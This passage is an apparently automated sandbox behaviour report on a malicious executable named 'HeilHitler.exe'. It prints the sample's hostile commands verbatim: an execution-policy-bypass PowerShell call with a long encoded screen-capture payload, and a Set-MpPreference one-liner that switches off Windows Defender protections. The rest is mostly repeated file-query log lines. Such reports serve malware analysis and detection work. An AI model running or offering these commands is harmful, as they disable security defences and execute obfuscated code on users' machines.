              Source: C:\Users\user\Desktop\HeilHitler.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exeCode function: 68_2_00007FF702C4B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,68_2_00007FF702C4B340
              Source: C:\Users\user\Desktop\HeilHitler.exeCode function: 0_2_00007FF633D89570 cpuid 0_2_00007FF633D89570
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\rarreg.key VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\VCRUNTIME140.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_decimal.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI74322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\HeilHitler.exeQueries volume information: C:\Users\user\Desktop\HeilHitler.exe VolumeInformationJump to behavior
